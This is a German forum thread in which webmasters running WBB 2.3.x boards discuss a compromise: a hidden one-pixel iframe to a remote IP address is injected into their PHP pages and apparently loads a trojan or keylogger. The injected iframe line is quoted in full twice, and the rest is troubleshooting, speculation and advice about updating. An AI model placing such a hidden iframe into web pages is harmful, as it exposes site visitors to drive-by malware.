Virus/Wurm-was könnte das sein?

ic3cu83z

New member
Hallo,

ein Freund von mir betreibt ein WBB 2.3.4 und seit ein paar Tagen hat insbesondere 1 User das Problem, dass sein Kaspersky rummotzt, URL bspw.:

http://208.69.230.178/logo/index.php (ist ein USA Webhoster, schätze mal gehackter Space)

Scheint momentan down zu sein, letzte Woche konnte ich noch eine http://208.69.230.178/example.txt einsehen, die u.a. Ebay-Userdaten enthielt, etc.

In einem anderen Forum haben wir das hier gefunden:
Mein Bruder hat mir gesagt das dies ein Virus ist, der sich gezielt im Browser festlegt.
Und bei manchen Seiten springt er dann an, und zeigt einen Virus an.

Angeblich soll dieser angebliche Virus der Seite, vom wirklichen Virus ablenken das dieser ohne Probleme arbeiten kann.

Empfohlen wird, den Browser geschlossen zu halten, und den Virenscanner drüberlaufen zu lassen.
Und falls er dann noch kommt, den Browser neu zu installieren.
Die Lesezeichen und Einstellungen kannst du vorher auch extra Exportieren.

Weiss nicht, was ich davon halten soll. Eine weitere Aussage war die hier:

Hallo,
ich hab mich hier ebend registriert weil ich recherchen zu dem Ärgernis h**p://81.95.149.26/logo/index.php angestellt habe.

Ich mach es mal schmerzlos : Ihr habt ( wie ich ) nen Hacker auf Eurem Server !!!!

Nachdem ich meine Startseite immer wieder nachgebessert haben , obwohl ich die Zeile

<iframe src='http://81.95.149.26/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

immer wieder gelöscht habe. Nun ist es soweit, das diese Zeile Serverseitig eingefügt wird - nur bei PHP-Dateien - wenn ich sie in .html umbenenne , dann erscheit die o.g. Zeile nicht im Quelltext.

Ich bin nun kein Spezialist mit Serversoftware , aber bin sicher das dies Serverseitig eingefügt wird.

Auf meiner Startseite unter http://xxxxxxx schaut Euch mal die erste Zeile des Quellcodes an - dort wird das Iframe als erste Zeile mit ausgeworfen - auf dem FTP liegt die Seite jedoch clean.

Ihr habt ein ähnliches Problem und ebenfalls dieses Iframe , das zur Virenwarnung führt ebenfalls in Euren Quelltexten.

Nun such ich nach ner Lösung aber Google spuckt nicht sehr viel aus - so hab ich auch her gefunden und wollte Euch drauf hinweisen was Sache ist.

Bin nicht ganz sicher , aber unter dem Iframe lädt man sich nen Trojaner / Keylogger auf den Rechner und offensichtlich ist die Erkennung der Virenscanner nicht sehr zuverlässig.

Könnte es das gleiche / analog zu dem Thread hier sein?

Vielen Dank im voraus für Eure Hilfe !
 

Mackz

Member of Honour
Original von ic3cu83z
ein Freund von mir betreibt ein WBB 2.3.4
Sorry, aber wer sein Board nicht aktuell hält, der ist selbst schuld. Es existieren diverse Sicherheitslücken in alten Versionen, die z.b. SQL Injections zulassen. Wenn der Betreiber nicht updated, dann ist ihm auch nicht mehr zu helfen. Dann hat er nicht das Recht sich über "böse Hacker" zu beschwerden, sondern es ist einzig und allein sein Fehler.
 

ic3cu83z

New member
Wäre das Problem dann damit auch behoben, wenn er auf 2.3.6 updated oder bleibt es bestehen?

Ich weiss halt nicht, was sich da abspielt, wie wir es lokalisieren können und er ist normalerweise auch nicht wirklich ein Ungeschickter, was WBB angeht. Über Google haben wir nichts gefunden, sonst würde ich Euch auch hier nicht damit belästigen ;)
 

stone.dr

New member
Tut mir leid, Mackz, aber in dem Fall muss ich Dir leider widersprechen.
Ich hatte ja genau das selbe Problem (mit nem wbb 2.3.6 pl1).
Ich dachte zuerst auch, dass der "Angriff" Lücken in bestehen Systemen verwendet - aber
gerade in dem Fall Einspeisung von:

Code:
<iframe src='http://81.95.149.26/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>
etc., behaupte ich einmal, dass der Code über das Confixx/Plesk bzw, die Datenbank eingeschleust wurde.

Wie komme ich zu der Vermutung -> ich habe gestern eine html Seite in meinen Webspace eingebaut und die Dateiendung .php verwendet (ohne PHP-Code zu verwenden) die auch kurze Zeit einwandfrei funktionierte -> später dann waren die Hyperlinks editiert - wie kann das sein?

Ich denke mal, das Problem ist, dass bestimmte Webspace hoster "unsicheren" Webspace vermieten und dass zu lasten der User geht.

Bei welchem Hoster bist Du denn?

Edit: Mein Webpspace, Links anschauen
 

Mackz

Member of Honour
@ic3cu83z: Ihr solltet auf jeden Fall updaten, unabhängig davon wodurch das aktuelle Problem verursacht wurde.

@stone.dr: Mag ja sein, trotzdem ist 2.3.4 unsicher.
 

ic3cu83z

New member
Danke Euch für Eure schnellen Antworten.

Wie würdet Ihr -mal das Update aussen vor- vorgehen, recherchieren, lokalisieren, etc ?

Muss dazu sagen, dass ich mich nicht mit der Boardsoft auskenne und Eure Tips lediglich weitergebe. Nur dass das hier halt nicht als N00b-Frage abgestempelt und deswegen nicht beantwortet wird :)
 

Elderan

Moderator
Hallo,
Original von Mackz
Sorry, aber wer sein Board nicht aktuell hält, der ist selbst schuld.

Naja die Poltik von WoltLab ist auch dem Update gegenüber nicht besonders freundlich, denn damit man sein Board dauerhaft mit Updates versorgen kann, muss man sich die Platinum Version für 159? kaufen.
Wer sich die Start-Version für 25? kauft, hat kein Zugang zu Updates, und jeden Hotfix per Hand einzufummeln, dass kann auch nicht jeder.

Ein Umdenken von Woltlab wäre evt. sinnvoll.

(Oder werden dennoch Sicherheitsupdates für alle 2er Versionen zur Verfügung gestellt, was ich mir kaum vorstellen kann?)
 

jose69

New member
Hallo!

Wer sich die Start-Version für 25? kauft, hat kein Zugang zu Updates,
Das ist falsch. Auch bei der Start-Kizenz gibt es Zugang zu Sicherheitsupdates. Und zwar im Rahmen der gesetzlichen Gewährleistung. Näheres dazu regelt das BGB bzw. das ProdHaftG.

Also hat man auch mit der Start-Lizenz die Möglichkeit, sein Board auf dem neusten Stand zu halten.
Wer dies nicht macht, kann leichter gehackt werden ;)
 
Oben